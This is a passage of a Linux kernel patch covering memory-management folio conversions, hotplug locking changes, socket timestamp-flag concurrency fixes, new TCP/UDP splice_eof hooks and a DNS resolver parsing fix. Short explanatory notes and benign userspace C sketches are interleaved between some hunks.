+ 			goto out_unlock;
+ 		}
+ 
+-		if (page_has_private(page) &&
+-		    !try_to_release_page(page, GFP_KERNEL)) {
++		if (!filemap_release_folio(folio, GFP_KERNEL)) {
+ 			result = SCAN_PAGE_HAS_PRIVATE;
+-			putback_lru_page(page);
++			folio_putback_lru(folio);
+ 			goto out_unlock;
+ 		}
+ 
+-		if (page_mapped(page))
+-			try_to_unmap(page_folio(page),
++		if (folio_mapped(folio))
++			try_to_unmap(folio,
+ 					TTU_IGNORE_MLOCK | TTU_BATCH_FLUSH);
+ 
+ 		xas_lock_irq(&xas);
+diff --git a/mm/memory-failure.c b/mm/memory-failure.c
+index ebd717157c813..5b846ed5dcbe9 100644
+--- a/mm/memory-failure.c
++++ b/mm/memory-failure.c
+@@ -827,16 +827,15 @@ static int truncate_error_page(struct page *p, unsigned long pfn,
+ 	int ret = MF_FAILED;
+ 
+ 	if (mapping->a_ops->error_remove_page) {
++		struct folio *folio = page_folio(p);
+ 		int err = mapping->a_ops->error_remove_page(mapping, p);
+ 
+-		if (err != 0) {
++		if (err != 0)
+ 			pr_info("%#lx: Failed to punch page: %d\n", pfn, err);
+-		} else if (page_has_private(p) &&
+-			   !try_to_release_page(p, GFP_NOIO)) {
++		else if (!filemap_release_folio(folio, GFP_NOIO))
+ 			pr_info("%#lx: failed to release buffers\n", pfn);
+-		} else {
++		else
+ 			ret = MF_RECOVERED;
+-		}
+ 	} else {
+ 		/*
+ 		 * If the file system doesn't support it just invalidate
+diff --git a/mm/memory.c b/mm/memory.c
+index 0d1b3ee8fcd7a..fc8b264ec0cac 100644
+--- a/mm/memory.c
++++ b/mm/memory.c
+@@ -3617,8 +3617,8 @@ EXPORT_SYMBOL_GPL(unmap_mapping_pages);
+ void unmap_mapping_range(struct address_space *mapping,
+ 		loff_t const holebegin, loff_t const holelen, int even_cows)
+ {
+-	pgoff_t hba = holebegin >> PAGE_SHIFT;
+-	pgoff_t hlen = (holelen + PAGE_SIZE - 1) >> PAGE_SHIFT;
++	pgoff_t hba = (pgoff_t)(holebegin) >> PAGE_SHIFT;
++	pgoff_t hlen = ((pgoff_t)(holelen) + PAGE_SIZE - 1) >> PAGE_SHIFT;
+ 
+ 	/* Check for overflow. */
+ 	if (sizeof(holelen) > sizeof(hlen)) {
+diff --git a/mm/memory_hotplug.c b/mm/memory_hotplug.c
+index bd2570b4f9b7b..3b9d3a4b43869 100644
+--- a/mm/memory_hotplug.c
++++ b/mm/memory_hotplug.c
+@@ -1069,6 +1069,9 @@ void mhp_deinit_memmap_on_memory(unsigned long pfn, unsigned long nr_pages)
+ 	kasan_remove_zero_shadow(__va(PFN_PHYS(pfn)), PFN_PHYS(nr_pages));
+ }
+ 
++/*
++ * Must be called with mem_hotplug_lock in write mode.
++ */
+ int __ref online_pages(unsigned long pfn, unsigned long nr_pages,
+ 		       struct zone *zone, struct memory_group *group)
+ {
+@@ -1089,7 +1092,6 @@ int __ref online_pages(unsigned long pfn, unsigned long nr_pages,
+ 			 !IS_ALIGNED(pfn + nr_pages, PAGES_PER_SECTION)))
+ 		return -EINVAL;
+ 
+-	mem_hotplug_begin();
+ 
+ 	/* associate pfn range with the zone */
+ 	move_pfn_range_to_zone(zone, pfn, nr_pages, NULL, MIGRATE_ISOLATE);
+@@ -1148,7 +1150,6 @@ int __ref online_pages(unsigned long pfn, unsigned long nr_pages,
+ 	writeback_set_ratelimit();
+ 
+ 	memory_notify(MEM_ONLINE, &arg);
+-	mem_hotplug_done();
+ 	return 0;
+ 
+ failed_addition:
+@@ -1157,7 +1158,6 @@ failed_addition:
+ 		 (((unsigned long long) pfn + nr_pages) << PAGE_SHIFT) - 1);
+ 	memory_notify(MEM_CANCEL_ONLINE, &arg);
+ 	remove_pfn_range_from_zone(zone, pfn, nr_pages);
+-	mem_hotplug_done();
+ 	return ret;
+ }
+ 
+@@ -1382,7 +1382,7 @@ int __ref add_memory_resource(int nid, struct resource *res, mhp_t mhp_flags)
+ 	ret = create_memory_block_devices(start, size, mhp_altmap.alloc,
+ 					  group);
+ 	if (ret) {
+-		arch_remove_memory(start, size, NULL);
++		arch_remove_memory(start, size, params.altmap);
+ 		goto error;
+ 	}
+ 
+@@ -1787,6 +1787,9 @@ static int count_system_ram_pages_cb(unsigned long start_pfn,
+ 	return 0;
+ }
+ 
++/*
++ * Must be called with mem_hotplug_lock in write mode.
++ */
+ int __ref offline_pages(unsigned long start_pfn, unsigned long nr_pages,
+ 			struct zone *zone, struct memory_group *group)
+ {
+@@ -1809,8 +1812,6 @@ int __ref offline_pages(unsigned long start_pfn, unsigned long nr_pages,
+ 			 !IS_ALIGNED(start_pfn + nr_pages, PAGES_PER_SECTION)))
+ 		return -EINVAL;
+ 
+-	mem_hotplug_begin();
+-
+ 	/*
+ 	 * Don't allow to offline memory blocks that contain holes.
+ 	 * Consequently, memory blocks with holes can never get onlined
+@@ -1946,7 +1947,6 @@ int __ref offline_pages(unsigned long start_pfn, unsigned long nr_pages,
+ 
+ 	memory_notify(MEM_OFFLINE, &arg);
+ 	remove_pfn_range_from_zone(zone, start_pfn, nr_pages);
+-	mem_hotplug_done();
+ 	return 0;
+ 
+ failed_removal_isolated:
+@@ -1961,7 +1961,6 @@ failed_removal:
+ 		 (unsigned long long) start_pfn << PAGE_SHIFT,
+ 		 ((unsigned long long) end_pfn << PAGE_SHIFT) - 1,
+ 		 reason);
+-	mem_hotplug_done();
+ 	return ret;
+ }
+ 
+diff --git a/mm/migrate.c b/mm/migrate.c
+index 91bd69c61148e..c93dd6a31c31a 100644
+--- a/mm/migrate.c
++++ b/mm/migrate.c
+@@ -914,8 +914,7 @@ static int fallback_migrate_folio(struct address_space *mapping,
+ 	 * Buffers may be managed in a filesystem specific way.
+ 	 * We must have no buffers or drop them.
+ 	 */
+-	if (folio_test_private(src) &&
+-	    !filemap_release_folio(src, GFP_KERNEL))
++	if (!filemap_release_folio(src, GFP_KERNEL))
+ 		return mode == MIGRATE_SYNC ? -EAGAIN : -EBUSY;
+ 
+ 	return migrate_folio(mapping, dst, src, mode);
+diff --git a/mm/page-writeback.c b/mm/page-writeback.c
+index 7e9d8d857ecca..de5f69921b946 100644
+--- a/mm/page-writeback.c
++++ b/mm/page-writeback.c
+@@ -3078,7 +3078,7 @@ EXPORT_SYMBOL_GPL(folio_wait_writeback_killable);
+  */
+ void folio_wait_stable(struct folio *folio)
+ {
+-	if (folio_inode(folio)->i_sb->s_iflags & SB_I_STABLE_WRITES)
++	if (mapping_stable_writes(folio_mapping(folio)))
+ 		folio_wait_writeback(folio);
+ }
+ EXPORT_SYMBOL_GPL(folio_wait_stable);
+diff --git a/mm/truncate.c b/mm/truncate.c
+index c0be77e5c0083..0d4dd233f5187 100644
+--- a/mm/truncate.c
++++ b/mm/truncate.c
+@@ -19,7 +19,6 @@
+ #include <linux/highmem.h>
+ #include <linux/pagevec.h>
+ #include <linux/task_io_accounting_ops.h>
+-#include <linux/buffer_head.h>	/* grr. try_to_release_page */
+ #include <linux/shmem_fs.h>
+ #include <linux/rmap.h>
+ #include "internal.h"
+@@ -276,7 +275,7 @@ static long mapping_evict_folio(struct address_space *mapping,
+ 	if (folio_ref_count(folio) >
+ 			folio_nr_pages(folio) + folio_has_private(folio) + 1)
+ 		return 0;
+-	if (folio_has_private(folio) && !filemap_release_folio(folio, 0))
++	if (!filemap_release_folio(folio, 0))
+ 		return 0;
+ 
+ 	return remove_mapping(mapping, folio);
+@@ -581,8 +580,7 @@ static int invalidate_complete_folio2(struct address_space *mapping,
+ 	if (folio->mapping != mapping)
+ 		return 0;
+ 
+-	if (folio_has_private(folio) &&
+-	    !filemap_release_folio(folio, GFP_KERNEL))
++	if (!filemap_release_folio(folio, GFP_KERNEL))
+ 		return 0;
+ 
+ 	spin_lock(&mapping->host->i_lock);
+diff --git a/mm/vmscan.c b/mm/vmscan.c
+index 3f090faa6377f..9f3cfb7caa48d 100644
+--- a/mm/vmscan.c
++++ b/mm/vmscan.c
+@@ -1992,7 +1992,7 @@ retry:
+ 		 * (refcount == 1) it can be freed.  Otherwise, leave
+ 		 * the folio on the LRU so it is swappable.
+ 		 */
+-		if (folio_has_private(folio)) {
++		if (folio_needs_release(folio)) {
+ 			if (!filemap_release_folio(folio, sc->gfp_mask))
+ 				goto activate_locked;
+ 			if (!mapping && folio_ref_count(folio) == 1) {
+@@ -2618,9 +2618,9 @@ static void shrink_active_list(unsigned long nr_to_scan,
+ 		}
+ 
+ 		if (unlikely(buffer_heads_over_limit)) {
+-			if (folio_test_private(folio) && folio_trylock(folio)) {
+-				if (folio_test_private(folio))
+-					filemap_release_folio(folio, 0);
++			if (folio_needs_release(folio) &&
++			    folio_trylock(folio)) {
++				filemap_release_folio(folio, 0);
+ 				folio_unlock(folio);
+ 			}
+ 		}
+diff --git a/net/can/j1939/socket.c b/net/can/j1939/socket.c
+index 9c828067b4481..b0be23559243c 100644
+--- a/net/can/j1939/socket.c
++++ b/net/can/j1939/socket.c
+@@ -974,6 +974,7 @@ static void __j1939_sk_errqueue(struct j1939_session *session, struct sock *sk,
+ 	struct sock_exterr_skb *serr;
+ 	struct sk_buff *skb;
+ 	char *state = "UNK";
++	u32 tsflags;
+ 	int err;
+ 
+ 	jsk = j1939_sk(sk);
+@@ -981,13 +982,14 @@ static void __j1939_sk_errqueue(struct j1939_session *session, struct sock *sk,
+ 	if (!(jsk->state & J1939_SOCK_ERRQUEUE))
+ 		return;
+ 
++	tsflags = READ_ONCE(sk->sk_tsflags);
+ 	switch (type) {
+ 	case J1939_ERRQUEUE_TX_ACK:
+-		if (!(sk->sk_tsflags & SOF_TIMESTAMPING_TX_ACK))
++		if (!(tsflags & SOF_TIMESTAMPING_TX_ACK))
+ 			return;
+ 		break;
+ 	case J1939_ERRQUEUE_TX_SCHED:
+-		if (!(sk->sk_tsflags & SOF_TIMESTAMPING_TX_SCHED))
++		if (!(tsflags & SOF_TIMESTAMPING_TX_SCHED))
+ 			return;
+ 		break;
+ 	case J1939_ERRQUEUE_TX_ABORT:
+@@ -997,7 +999,7 @@ static void __j1939_sk_errqueue(struct j1939_session *session, struct sock *sk,
+ 	case J1939_ERRQUEUE_RX_DPO:
+ 		fallthrough;
+ 	case J1939_ERRQUEUE_RX_ABORT:
+-		if (!(sk->sk_tsflags & SOF_TIMESTAMPING_RX_SOFTWARE))
++		if (!(tsflags & SOF_TIMESTAMPING_RX_SOFTWARE))
+ 			return;
+ 		break;
+ 	default:
+@@ -1054,7 +1056,7 @@ static void __j1939_sk_errqueue(struct j1939_session *session, struct sock *sk,
+ 	}
+ 
+ 	serr->opt_stats = true;
+-	if (sk->sk_tsflags & SOF_TIMESTAMPING_OPT_ID)
++	if (tsflags & SOF_TIMESTAMPING_OPT_ID)
+ 		serr->ee.ee_data = session->tskey;
+ 
+ 	netdev_dbg(session->priv->ndev, "%s: 0x%p tskey: %i, state: %s\n",
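
The pattern applied above recurs in several hunks below: snapshot a concurrently updated flags word once with READ_ONCE(), then test multiple bits against the same snapshot, so the decisions stay mutually consistent even if setsockopt() rewrites the word mid-function. A userspace sketch, with READ_ONCE approximated by a volatile access (GNU C typeof):

/* Userspace sketch of the snapshot-then-test pattern. */
#include <stdio.h>

#define READ_ONCE(x) (*(const volatile typeof(x) *)&(x))

#define FLAG_TX_ACK (1U << 0)
#define FLAG_RX_SW  (1U << 1)

static unsigned int sk_tsflags;	/* may be rewritten concurrently */

static void errqueue(void)
{
	unsigned int tsflags = READ_ONCE(sk_tsflags);

	/* every test below sees the same coherent value */
	if (tsflags & FLAG_TX_ACK)
		printf("report tx ack\n");
	if (tsflags & FLAG_RX_SW)
		printf("report rx timestamp\n");
}

int main(void)
{
	sk_tsflags = FLAG_TX_ACK | FLAG_RX_SW;
	errqueue();
	return 0;
}
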
+diff --git a/net/can/raw.c b/net/can/raw.c
+index 8c104339d538d..488320738e319 100644
+--- a/net/can/raw.c
++++ b/net/can/raw.c
+@@ -881,6 +881,7 @@ static int raw_sendmsg(struct socket *sock, struct msghdr *msg, size_t size)
+ 
+ 	skb->dev = dev;
+ 	skb->priority = sk->sk_priority;
++	skb->mark = sk->sk_mark;
+ 	skb->tstamp = sockc.transmit_time;
+ 
+ 	skb_setup_tx_timestamp(skb, sockc.tsflags);
+diff --git a/net/core/skbuff.c b/net/core/skbuff.c
+index 73b1e0e53534e..8a819d0a7bfb0 100644
+--- a/net/core/skbuff.c
++++ b/net/core/skbuff.c
+@@ -4913,7 +4913,7 @@ static void __skb_complete_tx_timestamp(struct sk_buff *skb,
+ 	serr->ee.ee_info = tstype;
+ 	serr->opt_stats = opt_stats;
+ 	serr->header.h4.iif = skb->dev ? skb->dev->ifindex : 0;
+-	if (sk->sk_tsflags & SOF_TIMESTAMPING_OPT_ID) {
++	if (READ_ONCE(sk->sk_tsflags) & SOF_TIMESTAMPING_OPT_ID) {
+ 		serr->ee.ee_data = skb_shinfo(skb)->tskey;
+ 		if (sk_is_tcp(sk))
+ 			serr->ee.ee_data -= atomic_read(&sk->sk_tskey);
+@@ -4969,21 +4969,23 @@ void __skb_tstamp_tx(struct sk_buff *orig_skb,
+ {
+ 	struct sk_buff *skb;
+ 	bool tsonly, opt_stats = false;
++	u32 tsflags;
+ 
+ 	if (!sk)
+ 		return;
+ 
+-	if (!hwtstamps && !(sk->sk_tsflags & SOF_TIMESTAMPING_OPT_TX_SWHW) &&
++	tsflags = READ_ONCE(sk->sk_tsflags);
++	if (!hwtstamps && !(tsflags & SOF_TIMESTAMPING_OPT_TX_SWHW) &&
+ 	    skb_shinfo(orig_skb)->tx_flags & SKBTX_IN_PROGRESS)
+ 		return;
+ 
+-	tsonly = sk->sk_tsflags & SOF_TIMESTAMPING_OPT_TSONLY;
++	tsonly = tsflags & SOF_TIMESTAMPING_OPT_TSONLY;
+ 	if (!skb_may_tx_timestamp(sk, tsonly))
+ 		return;
+ 
+ 	if (tsonly) {
+ #ifdef CONFIG_INET
+-		if ((sk->sk_tsflags & SOF_TIMESTAMPING_OPT_STATS) &&
++		if ((tsflags & SOF_TIMESTAMPING_OPT_STATS) &&
+ 		    sk_is_tcp(sk)) {
+ 			skb = tcp_get_timestamping_opt_stats(sk, orig_skb,
+ 							     ack_skb);
+diff --git a/net/core/skmsg.c b/net/core/skmsg.c
+index a5c1f67dc96ec..3818035ea0021 100644
+--- a/net/core/skmsg.c
++++ b/net/core/skmsg.c
+@@ -825,6 +825,8 @@ static void sk_psock_destroy(struct work_struct *work)
+ 
+ 	if (psock->sk_redir)
+ 		sock_put(psock->sk_redir);
++	if (psock->sk_pair)
++		sock_put(psock->sk_pair);
+ 	sock_put(psock->sk);
+ 	kfree(psock);
+ }
+diff --git a/net/core/sock.c b/net/core/sock.c
+index 4305e55dbfba4..c50a14a02edd4 100644
+--- a/net/core/sock.c
++++ b/net/core/sock.c
+@@ -890,7 +890,7 @@ static int sock_timestamping_bind_phc(struct sock *sk, int phc_index)
+ 	if (!match)
+ 		return -EINVAL;
+ 
+-	sk->sk_bind_phc = phc_index;
++	WRITE_ONCE(sk->sk_bind_phc, phc_index);
+ 
+ 	return 0;
+ }
+@@ -926,7 +926,7 @@ int sock_set_timestamping(struct sock *sk, int optname,
+ 			return ret;
+ 	}
+ 
+-	sk->sk_tsflags = val;
++	WRITE_ONCE(sk->sk_tsflags, val);
+ 	sock_valbool_flag(sk, SOCK_TSTAMP_NEW, optname == SO_TIMESTAMPING_NEW);
+ 
+ 	if (val & SOF_TIMESTAMPING_RX_SOFTWARE)
+@@ -1704,9 +1704,16 @@ int sk_getsockopt(struct sock *sk, int level, int optname,
+ 		break;
+ 
+ 	case SO_TIMESTAMPING_OLD:
++	case SO_TIMESTAMPING_NEW:
+ 		lv = sizeof(v.timestamping);
+-		v.timestamping.flags = sk->sk_tsflags;
+-		v.timestamping.bind_phc = sk->sk_bind_phc;
++		/* For the later-added case SO_TIMESTAMPING_NEW: Be strict about only
++		 * returning the flags when they were set through the same option.
++		 * Don't change the behaviour for the old case SO_TIMESTAMPING_OLD.
++		 */
++		if (optname == SO_TIMESTAMPING_OLD || sock_flag(sk, SOCK_TSTAMP_NEW)) {
++			v.timestamping.flags = READ_ONCE(sk->sk_tsflags);
++			v.timestamping.bind_phc = READ_ONCE(sk->sk_bind_phc);
++		}
+ 		break;
+ 
+ 	case SO_RCVTIMEO_OLD:
+@@ -2764,6 +2771,7 @@ int __sock_cmsg_send(struct sock *sk, struct msghdr *msg, struct cmsghdr *cmsg,
+ 		sockc->mark = *(u32 *)CMSG_DATA(cmsg);
+ 		break;
+ 	case SO_TIMESTAMPING_OLD:
++	case SO_TIMESTAMPING_NEW:
+ 		if (cmsg->cmsg_len != CMSG_LEN(sizeof(u32)))
+ 			return -EINVAL;
+ 
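
From userspace, the getsockopt() change is visible through the standard SO_TIMESTAMPING interface. A minimal sketch using the uapi struct so_timestamping; header availability of the SO_TIMESTAMPING constant varies by libc, hence the guard.

/* Set and read back socket timestamping flags. */
#include <stdio.h>
#include <sys/socket.h>
#include <linux/net_tstamp.h>

#ifndef SO_TIMESTAMPING
#define SO_TIMESTAMPING 37	/* SO_TIMESTAMPING_OLD */
#endif

int main(void)
{
	struct so_timestamping ts = {
		.flags = SOF_TIMESTAMPING_RX_SOFTWARE |
			 SOF_TIMESTAMPING_SOFTWARE,
	};
	socklen_t len = sizeof(ts);
	int fd = socket(AF_INET, SOCK_DGRAM, 0);

	if (fd < 0)
		return 1;
	if (setsockopt(fd, SOL_SOCKET, SO_TIMESTAMPING, &ts, sizeof(ts)) ||
	    getsockopt(fd, SOL_SOCKET, SO_TIMESTAMPING, &ts, &len))
		return 1;
	printf("flags %#x bind_phc %d\n", ts.flags, ts.bind_phc);
	return 0;
}
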
+diff --git a/net/core/sock_map.c b/net/core/sock_map.c
+index 38e01f82f2ef3..91140bc0541f3 100644
+--- a/net/core/sock_map.c
++++ b/net/core/sock_map.c
+@@ -538,6 +538,8 @@ static bool sock_map_sk_state_allowed(const struct sock *sk)
+ {
+ 	if (sk_is_tcp(sk))
+ 		return (1 << sk->sk_state) & (TCPF_ESTABLISHED | TCPF_LISTEN);
++	if (sk_is_stream_unix(sk))
++		return (1 << sk->sk_state) & TCPF_ESTABLISHED;
+ 	return true;
+ }
+ 
+diff --git a/net/dns_resolver/dns_key.c b/net/dns_resolver/dns_key.c
+index 03f8f33dc134c..8324e9f970668 100644
+--- a/net/dns_resolver/dns_key.c
++++ b/net/dns_resolver/dns_key.c
+@@ -91,8 +91,6 @@ const struct cred *dns_resolver_cache;
+ static int
+ dns_resolver_preparse(struct key_preparsed_payload *prep)
+ {
+-	const struct dns_server_list_v1_header *v1;
+-	const struct dns_payload_header *bin;
+ 	struct user_key_payload *upayload;
+ 	unsigned long derrno;
+ 	int ret;
+@@ -103,27 +101,28 @@ dns_resolver_preparse(struct key_preparsed_payload *prep)
+ 		return -EINVAL;
+ 
+ 	if (data[0] == 0) {
++		const struct dns_server_list_v1_header *v1;
++
+ 		/* It may be a server list. */
+-		if (datalen <= sizeof(*bin))
++		if (datalen <= sizeof(*v1))
+ 			return -EINVAL;
+ 
+-		bin = (const struct dns_payload_header *)data;
+-		kenter("[%u,%u],%u", bin->content, bin->version, datalen);
+-		if (bin->content != DNS_PAYLOAD_IS_SERVER_LIST) {
++		v1 = (const struct dns_server_list_v1_header *)data;
++		kenter("[%u,%u],%u", v1->hdr.content, v1->hdr.version, datalen);
++		if (v1->hdr.content != DNS_PAYLOAD_IS_SERVER_LIST) {
+ 			pr_warn_ratelimited(
+ 				"dns_resolver: Unsupported content type (%u)\n",
+-				bin->content);
++				v1->hdr.content);
+ 			return -EINVAL;
+ 		}
+ 
+-		if (bin->version != 1) {
++		if (v1->hdr.version != 1) {
+ 			pr_warn_ratelimited(
+ 				"dns_resolver: Unsupported server list version (%u)\n",
+-				bin->version);
++				v1->hdr.version);
+ 			return -EINVAL;
+ 		}
+ 
+-		v1 = (const struct dns_server_list_v1_header *)bin;
+ 		if ((v1->status != DNS_LOOKUP_GOOD &&
+ 		     v1->status != DNS_LOOKUP_GOOD_WITH_BAD)) {
+ 			if (prep->expiry == TIME64_MAX)
+diff --git a/net/ethtool/netlink.c b/net/ethtool/netlink.c
+index 1a4c11356c96c..fc4ccecf9495c 100644
+--- a/net/ethtool/netlink.c
++++ b/net/ethtool/netlink.c
+@@ -509,7 +509,7 @@ lock_and_cont:
+ cont:
+ 			idx++;
+ 		}
+-
++		ret = 0;
+ 	}
+ 	rtnl_unlock();
+ 
+diff --git a/net/ipv4/af_inet.c b/net/ipv4/af_inet.c
+index 5d379df90c826..347c3768df6e8 100644
+--- a/net/ipv4/af_inet.c
++++ b/net/ipv4/af_inet.c
+@@ -838,6 +838,21 @@ int inet_sendmsg(struct socket *sock, struct msghdr *msg, size_t size)
+ }
+ EXPORT_SYMBOL(inet_sendmsg);
+ 
++void inet_splice_eof(struct socket *sock)
++{
++	const struct proto *prot;
++	struct sock *sk = sock->sk;
++
++	if (unlikely(inet_send_prepare(sk)))
++		return;
++
++	/* IPV6_ADDRFORM can change sk->sk_prot under us. */
++	prot = READ_ONCE(sk->sk_prot);
++	if (prot->splice_eof)
++		prot->splice_eof(sock);
++}
++EXPORT_SYMBOL_GPL(inet_splice_eof);
++
+ ssize_t inet_sendpage(struct socket *sock, struct page *page, int offset,
+ 		      size_t size, int flags)
+ {
+@@ -1057,6 +1072,7 @@ const struct proto_ops inet_stream_ops = {
+ #ifdef CONFIG_MMU
+ 	.mmap		   = tcp_mmap,
+ #endif
++	.splice_eof	   = inet_splice_eof,
+ 	.sendpage	   = inet_sendpage,
+ 	.splice_read	   = tcp_splice_read,
+ 	.read_sock	   = tcp_read_sock,
+@@ -1091,6 +1107,7 @@ const struct proto_ops inet_dgram_ops = {
+ 	.read_skb	   = udp_read_skb,
+ 	.recvmsg	   = inet_recvmsg,
+ 	.mmap		   = sock_no_mmap,
++	.splice_eof	   = inet_splice_eof,
+ 	.sendpage	   = inet_sendpage,
+ 	.set_peek_off	   = sk_set_peek_off,
+ #ifdef CONFIG_COMPAT
+@@ -1122,6 +1139,7 @@ static const struct proto_ops inet_sockraw_ops = {
+ 	.sendmsg	   = inet_sendmsg,
+ 	.recvmsg	   = inet_recvmsg,
+ 	.mmap		   = sock_no_mmap,
++	.splice_eof	   = inet_splice_eof,
+ 	.sendpage	   = inet_sendpage,
+ #ifdef CONFIG_COMPAT
+ 	.compat_ioctl	   = inet_compat_ioctl,
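
The ->splice_eof() hook added to these proto_ops fires when a splice() to the socket finishes, letting the protocol flush any buffered tail. From userspace the relevant pattern is plain splice(2); a hedged helper sketch, meant to be called with a pipe read end and a connected TCP socket (error handling trimmed):

/* Splice a pipe into a socket, hinting MSG_MORE until the last chunk. */
#define _GNU_SOURCE
#include <fcntl.h>
#include <unistd.h>

ssize_t splice_all(int pipe_rd, int sock_fd, size_t len)
{
	ssize_t total = 0;

	while (len > 0) {
		/* SPLICE_F_MORE hints more data follows; dropping it on
		 * the final chunk lets the protocol push the tail out. */
		ssize_t n = splice(pipe_rd, NULL, sock_fd, NULL, len,
				   len > 65536 ? SPLICE_F_MORE : 0);
		if (n <= 0)
			return n;
		total += n;
		len -= n;
	}
	return total;
}
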
+diff --git a/net/ipv4/ip_output.c b/net/ipv4/ip_output.c
+index 493c679ea54f3..e19ef88ae181f 100644
+--- a/net/ipv4/ip_output.c
++++ b/net/ipv4/ip_output.c
+@@ -990,8 +990,8 @@ static int __ip_append_data(struct sock *sk,
+ 	mtu = cork->gso_size ? IP_MAX_MTU : cork->fragsize;
+ 	paged = !!cork->gso_size;
+ 
+-	if (cork->tx_flags & SKBTX_ANY_SW_TSTAMP &&
+-	    sk->sk_tsflags & SOF_TIMESTAMPING_OPT_ID)
++	if (cork->tx_flags & SKBTX_ANY_TSTAMP &&
++	    READ_ONCE(sk->sk_tsflags) & SOF_TIMESTAMPING_OPT_ID)
+ 		tskey = atomic_inc_return(&sk->sk_tskey) - 1;
+ 
+ 	hh_len = LL_RESERVED_SPACE(rt->dst.dev);
+diff --git a/net/ipv4/ip_sockglue.c b/net/ipv4/ip_sockglue.c
+index 63aa52becd880..c1fb7580ea581 100644
+--- a/net/ipv4/ip_sockglue.c
++++ b/net/ipv4/ip_sockglue.c
+@@ -509,7 +509,7 @@ static bool ipv4_datagram_support_cmsg(const struct sock *sk,
+ 	 * or without payload (SOF_TIMESTAMPING_OPT_TSONLY).
+ 	 */
+ 	info = PKTINFO_SKB_CB(skb);
+-	if (!(sk->sk_tsflags & SOF_TIMESTAMPING_OPT_CMSG) ||
++	if (!(READ_ONCE(sk->sk_tsflags) & SOF_TIMESTAMPING_OPT_CMSG) ||
+ 	    !info->ipi_ifindex)
+ 		return false;
+ 
+diff --git a/net/ipv4/tcp.c b/net/ipv4/tcp.c
+index 58409ea2da0af..0b7844a8d5711 100644
+--- a/net/ipv4/tcp.c
++++ b/net/ipv4/tcp.c
+@@ -1492,6 +1492,22 @@ int tcp_sendmsg(struct sock *sk, struct msghdr *msg, size_t size)
+ }
+ EXPORT_SYMBOL(tcp_sendmsg);
+ 
++void tcp_splice_eof(struct socket *sock)
++{
++	struct sock *sk = sock->sk;
++	struct tcp_sock *tp = tcp_sk(sk);
++	int mss_now, size_goal;
++
++	if (!tcp_write_queue_tail(sk))
++		return;
++
++	lock_sock(sk);
++	mss_now = tcp_send_mss(sk, &size_goal, 0);
++	tcp_push(sk, 0, mss_now, tp->nonagle, size_goal);
++	release_sock(sk);
++}
++EXPORT_SYMBOL_GPL(tcp_splice_eof);
++
+ /*
+  *	Handle reading urgent data. BSD has very simple semantics for
+  *	this, no blocking and very strange errors 8)
+@@ -2359,14 +2375,14 @@ void tcp_recv_timestamp(struct msghdr *msg, const struct sock *sk,
+ 			}
+ 		}
+ 
+-		if (sk->sk_tsflags & SOF_TIMESTAMPING_SOFTWARE)
++		if (READ_ONCE(sk->sk_tsflags) & SOF_TIMESTAMPING_SOFTWARE)
+ 			has_timestamping = true;
+ 		else
+ 			tss->ts[0] = (struct timespec64) {0};
+ 	}
+ 
+ 	if (tss->ts[2].tv_sec || tss->ts[2].tv_nsec) {
+-		if (sk->sk_tsflags & SOF_TIMESTAMPING_RAW_HARDWARE)
++		if (READ_ONCE(sk->sk_tsflags) & SOF_TIMESTAMPING_RAW_HARDWARE)
+ 			has_timestamping = true;
+ 		else
+ 			tss->ts[2] = (struct timespec64) {0};
+diff --git a/net/ipv4/tcp_ipv4.c b/net/ipv4/tcp_ipv4.c
+index 7ebbbe561e402..be2c807eed15d 100644
+--- a/net/ipv4/tcp_ipv4.c
++++ b/net/ipv4/tcp_ipv4.c
+@@ -3067,6 +3067,7 @@ struct proto tcp_prot = {
+ 	.keepalive		= tcp_set_keepalive,
+ 	.recvmsg		= tcp_recvmsg,
+ 	.sendmsg		= tcp_sendmsg,
++	.splice_eof		= tcp_splice_eof,
+ 	.sendpage		= tcp_sendpage,
+ 	.backlog_rcv		= tcp_v4_do_rcv,
+ 	.release_cb		= tcp_release_cb,
+diff --git a/net/ipv4/udp.c b/net/ipv4/udp.c
+index 65abc92a81bd0..5672d9a86c5d2 100644
+--- a/net/ipv4/udp.c
++++ b/net/ipv4/udp.c
+@@ -733,7 +733,7 @@ int __udp4_lib_err(struct sk_buff *skb, u32 info, struct udp_table *udptable)
+ 			       iph->saddr, uh->source, skb->dev->ifindex,
+ 			       inet_sdif(skb), udptable, NULL);
+ 
+-	if (!sk || udp_sk(sk)->encap_type) {
++	if (!sk || READ_ONCE(udp_sk(sk)->encap_type)) {
+ 		/* No socket for error: try tunnels before discarding */
+ 		if (static_branch_unlikely(&udp_encap_needed_key)) {
+ 			sk = __udp4_lib_err_encap(net, iph, uh, udptable, sk, skb,
+@@ -1068,7 +1068,7 @@ int udp_sendmsg(struct sock *sk, struct msghdr *msg, size_t len)
+ 	__be16 dport;
+ 	u8  tos;
+ 	int err, is_udplite = IS_UDPLITE(sk);
+-	int corkreq = READ_ONCE(up->corkflag) || msg->msg_flags&MSG_MORE;
++	int corkreq = udp_test_bit(CORK, sk) || msg->msg_flags & MSG_MORE;
+ 	int (*getfrag)(void *, char *, int, int, int, struct sk_buff *);
+ 	struct sk_buff *skb;
+ 	struct ip_options_data opt_copy;
+@@ -1332,57 +1332,33 @@ do_confirm:
+ }
+ EXPORT_SYMBOL(udp_sendmsg);
+ 
+-int udp_sendpage(struct sock *sk, struct page *page, int offset,
+-		 size_t size, int flags)
++void udp_splice_eof(struct socket *sock)
+ {
+-	struct inet_sock *inet = inet_sk(sk);
++	struct sock *sk = sock->sk;
+ 	struct udp_sock *up = udp_sk(sk);
+-	int ret;
+ 
+-	if (flags & MSG_SENDPAGE_NOTLAST)
+-		flags |= MSG_MORE;
+-
+-	if (!up->pending) {
+-		struct msghdr msg = {	.msg_flags = flags|MSG_MORE };
+-
+-		/* Call udp_sendmsg to specify destination address which
+-		 * sendpage interface can't pass.
+-		 * This will succeed only when the socket is connected.
+-		 */
+-		ret = udp_sendmsg(sk, &msg, 0);
+-		if (ret < 0)
+-			return ret;
+-	}
++	if (!up->pending || udp_test_bit(CORK, sk))
++		return;
+ 
+ 	lock_sock(sk);
++	if (up->pending && !udp_test_bit(CORK, sk))
++		udp_push_pending_frames(sk);
++	release_sock(sk);
++}
++EXPORT_SYMBOL_GPL(udp_splice_eof);
+ 
+-	if (unlikely(!up->pending)) {
+-		release_sock(sk);
+-
+-		net_dbg_ratelimited("cork failed\n");
+-		return -EINVAL;
+-	}
++int udp_sendpage(struct sock *sk, struct page *page, int offset,
++		 size_t size, int flags)
++{
++	struct bio_vec bvec;
++	struct msghdr msg = { .msg_flags = flags | MSG_SPLICE_PAGES };
+ 
+-	ret = ip_append_page(sk, &inet->cork.fl.u.ip4,
